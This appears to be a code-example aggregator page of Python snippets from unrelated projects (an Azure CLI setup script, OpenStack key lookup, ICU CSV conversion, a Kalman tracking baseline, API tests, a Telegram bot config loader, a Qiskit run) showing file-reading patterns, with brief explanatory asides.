setup(name='azure-cli-acr',
      version=VERSION,
      description='Microsoft Azure Command-Line Tools ACR Command Module',
      long_description=README + '\n\n' + HISTORY,
      license='MIT',
      author='Microsoft Corporation',
      author_email='*****@*****.**',
      url='https://github.com/Azure/azure-cli',
      classifiers=CLASSIFIERS,
      packages=[
          'azure',
Code Example #53
    def _find_vim_key(vim_id):
        key_file = os.path.join(CONF.vim_keys.openstack, vim_id)
        LOG.debug(_('Attempting to open key file for vim id %s'), vim_id)
        try:
            with open(key_file, 'r') as f:
                return f.read()
        except IOError:
            # fall through with None when the key file is missing or unreadable
            LOG.warning(_('VIM id invalid or key not found for %s'), vim_id)
Code Example #54
File: bot.py Project: Prince-of-Galar/ChattyBot
def loadKeywords():
    # Open the keywords text file and split it on the ' | ' delimiter
    with open('./data/keywords.txt', 'r') as f:
        tempm = f.read().split(' | ')
    return tempm
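
Given the ' | ' delimiter, ./data/keywords.txt would be a single line of pipe-separated entries; a hypothetical example:

hello | thanks | help me | goodbye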
Code Example #55
import csv


def isBlank(myString):
    return not (myString and myString.strip())


filer = open('ICUSTAYS.csv')
filew = open('ICUSTAYS_table.csv', 'wb')

try:
    inputnum = 0
    outputnum = 0
    reader = csv.DictReader(filer)
    # DictReader already consumes the header row as its field names,
    # so no extra next() call is needed to skip it
    fieldsname = [
        'SUBJECT_ID', 'ICUSTAY_ID', 'DBSOURCE', 'FIRST_CAREUNIT',
        'LAST_CAREUNIT', 'FIRST_WARDID', 'LAST_WARDID', 'LOS', 'INTIME',
        'OUTTIME'
    ]
    writer = csv.DictWriter(filew, fieldnames=fieldsname)
    writer.writeheader()
    for r in reader:
        inputnum = inputnum + 1
        del r['ROW_ID']
        del r['HADM_ID']
        startpoint = r['INTIME']
        endpoint = r['OUTTIME']
        startpoint = startpoint[:4] + startpoint[5:7] + startpoint[8:10]
        sp = int(startpoint)
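
The fragment ends mid-loop; a hedged sketch of the likely continuation (OUTTIME normalized the same way as INTIME, the trimmed row written out, and both files closed; every name past this point is an assumption):

        endpoint = endpoint[:4] + endpoint[5:7] + endpoint[8:10]
        ep = int(endpoint)
        writer.writerow(r)
        outputnum = outputnum + 1
finally:
    filer.close()
    filew.close()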
Code Example #56
def use_baseline(script_args, hype, MASTER_ROOT_DIR):
    for index in range(script_args['DATA_AMOUNT_EVAL_START'],
                       script_args['DATA_AMOUNT_EVAL_END']):
        start_index = index * 100
        end_index = start_index + 100
        print("NOW LOADING IMAGES FROM " + str(start_index) + " TO " +
              str(end_index))

        fp = open(
            os.path.join(
                MASTER_ROOT_DIR, script_args['ROOT_DIR'], "bbox_files",
                "bboxes" + str(start_index) + "to" + str(end_index)) + ".txt",
            "rb")
        list_of_dicts = pickle.load(fp)
        total_seq_len = hype['input_seq_len'] + hype['target_seq_len']
        for j in range((end_index - start_index) // total_seq_len):
            start_img = j * total_seq_len
            end_img = start_img + total_seq_len

            all_agents_subset = []
            for dict in list_of_dicts[start_img:end_img]:
                for agent in dict.keys():
                    all_agents_subset.append(agent)
            all_agents_subset_unique = list(set(all_agents_subset))
            print("TOTAL UNIQUE AGENTS " + str(len(all_agents_subset_unique)))
            for current_agent in all_agents_subset_unique:
                current_agent_counter = 0
                for dict in list_of_dicts[start_img:end_img]:
                    if current_agent in dict.keys():
                        current_agent_counter += 1
                if current_agent_counter == total_seq_len:
                    print("NOW WORKING ON AGENT " + str(current_agent))

                    if script_args['BASELINE'] in ['AVG']:
                        avg_bbox_diff = np.zeros(4)
                        agent_bbox = list_of_dicts[start_img][current_agent]
                        for dict in list_of_dicts[
                                start_img:start_img +
                                script_args['input_seq_len']]:
                            avg_bbox_diff += (dict[current_agent] - agent_bbox)
                        last_known_agent_bbox = list_of_dicts[
                            start_img + script_args['input_seq_len'] -
                            1][current_agent]
                        prediction = last_known_agent_bbox + script_args['target_seq_len'] * \
                                     (avg_bbox_diff / (script_args['input_seq_len'] - 1))

                        for dict in list_of_dicts[start_img:end_img]:
                            dict[str(current_agent) +
                                 ' (PREDICTION)'] = prediction
                    elif script_args['BASELINE'] in ['KALMAN']:
                        measurements = []
                        for dict in list_of_dicts[
                                start_img:start_img +
                                script_args['input_seq_len']]:
                            measurements.append(dict[current_agent])
                        measurements_np = np.asarray(measurements)
                        initial_state_mean = [
                            measurements_np[0, 0], 0, measurements_np[0, 1], 0,
                            measurements_np[0, 2], 0, measurements_np[0, 3], 0
                        ]
                        transition_matrix = [[1, 1, 0, 0, 0, 0, 0, 0],
                                             [0, 1, 0, 0, 0, 0, 0, 0],
                                             [0, 0, 1, 1, 0, 0, 0, 0],
                                             [0, 0, 0, 1, 0, 0, 0, 0],
                                             [0, 0, 0, 0, 1, 1, 0, 0],
                                             [0, 0, 0, 0, 0, 1, 0, 0],
                                             [0, 0, 0, 0, 0, 0, 1, 1],
                                             [0, 0, 0, 0, 0, 0, 0, 1]]
                        observation_matrix = [[1, 0, 0, 0, 0, 0, 0, 0],
                                              [0, 0, 1, 0, 0, 0, 0, 0],
                                              [0, 0, 0, 0, 1, 0, 0, 0],
                                              [0, 0, 0, 0, 0, 0, 1, 0]]
                        kf = KalmanFilter(
                            transition_matrices=transition_matrix,
                            observation_matrices=observation_matrix,
                            initial_state_mean=initial_state_mean)

                        for pred in range(script_args['target_seq_len']):
                            kf = kf.em(measurements_np, n_iter=5)
                            kf.smooth(measurements_np)
                        # note: the smoothed state estimates are discarded above,
                        # so this "prediction" is simply the last observed bbox
                        prediction = np.array([
                            measurements_np[-1, 0], measurements_np[-1, 1],
                            measurements_np[-1, 2], measurements_np[-1, 3]
                        ])
                        for dict in list_of_dicts[start_img:end_img]:
                            dict[str(current_agent) +
                                 ' (PREDICTION)'] = prediction
                else:
                    print("AGENT " + str(current_agent) + " NOT FULLY PRESENT")

        with open(
                "predictions_baseline" + str(start_index) + "to" +
                str(end_index) + ".txt", "wb") as fp:
            pickle.dump(list_of_dicts, fp)
Code Example #57
File: test_get_user.py Project: ellinaMart/api_tests
# -*- coding: utf-8 -*-
import requests
import os
import json

# note: os.path.dirname('api_tests') evaluates to '', so this opens ./config.json from the working directory
with open(os.path.join(os.path.dirname('api_tests'), 'config.json')) as config_file:
    config = json.load(config_file)

def test_get_user():
    user_ids = []
    # for each page, request the list of users on that page
    for page in [1,2,3]:
        params = {
            "page" : page
        }
        resp = requests.get(config["url_users"], params)
        assert resp.status_code == 200

        # check that the correct page is returned
        json_data = json.loads(resp.text)
        assert json_data["page"] == page

        # collect all user ids into a list
        for i in json_data["data"]:
            user_ids.append(i["id"])

    # for each collected user id, request that user's details
    for id in user_ids:
        resp_user = requests.get(config["url_users"] + "/" + str(id))
        assert resp_user.status_code == 200
Code Example #58
File: goes.py Project: stoyanovd/yodabotrus
    a = sorted(a, key=lambda s: sorting_rule(morph.parse(s)[0].tag))

    ans = ' '.join(a)
    bot.send_message(chat_id=update.message.chat_id, text=ans)


#################################################
from yaml import safe_load, dump  # safe_load: yaml.load without an explicit Loader is deprecated/unsafe

env_file = '.env.yaml'

token_str = 'TELEGRAM_BOT_TOKEN'

if os.path.exists(env_file):
    print('found local env file')
    with open(env_file, 'r') as f:
        data = safe_load(f)
        assert token_str in data.keys()
        os.environ[token_str] = data[token_str]

assert token_str in os.environ.keys()

TOKEN = os.environ.get(token_str)
PORT = int(os.environ.get('PORT', '5000'))

#################################################


updater = Updater(TOKEN)

dispatcher = updater.dispatcher
Code Example #59
        for n in self.data:
            if n[0] == 0:
                win0 += 1
            else:
                win1 += 1
                
        if win0 > win1:
            self.label = 0
        else:
            self.label = 1

#--------------------------------------------   
        
        

file = open('specttrain.txt', 'r')
data = file.readlines()
data = data[:-1]
file.close()

data_list = [[int(x) for x in xs.strip().split(",")] for xs in data]


i_gain = []

for i in range(1, len(data_list[0])):
    node = Node(data_list)
    node.create_layer(i)

    i_gain.append((I(node), i))
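
I() and Node are defined outside this fragment; as a rough sketch, an entropy-style impurity measure I() for rows whose first column is a binary label could look like this (all internals here are assumptions):

import math

def entropy(rows):
    # Shannon entropy of the binary labels stored in column 0 of each row
    total = len(rows)
    if total == 0:
        return 0.0
    p1 = sum(r[0] for r in rows) / float(total)
    if p1 in (0.0, 1.0):
        return 0.0
    return -(p1 * math.log(p1, 2) + (1 - p1) * math.log(1 - p1, 2))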
    
Code Example #60

if __name__ == '__main__':
    n = 2
    f = lambda rep: rep[-1]
    # f = lambda rep: "1" if rep[0:2] == "01" or rep[0:2] == "10" else "0"
    # f = lambda rep: "0"
    prog = make_circuit(n, f)
    sample_shot = 2800
    backend = BasicAer.get_backend('statevector_simulator')

    circuit1 = transpile(prog, FakeVigo())
    circuit1.x(qubit=3)
    circuit1.x(qubit=3)  # two consecutive X gates on the same qubit cancel to the identity
    prog = circuit1

    info = execute(prog, backend=backend).result().get_statevector()
    qubits = round(log2(len(info)))
    info = {
        np.binary_repr(i, qubits): round(
            (info[i] * (info[i].conjugate())).real, 3)
        for i in range(2**qubits)
    }

    writefile = open("../data/startQiskit_Class210.csv", "w")
    print(info, file=writefile)
    print("results end", file=writefile)
    print(circuit1.depth(), file=writefile)
    print(circuit1, file=writefile)
    writefile.close()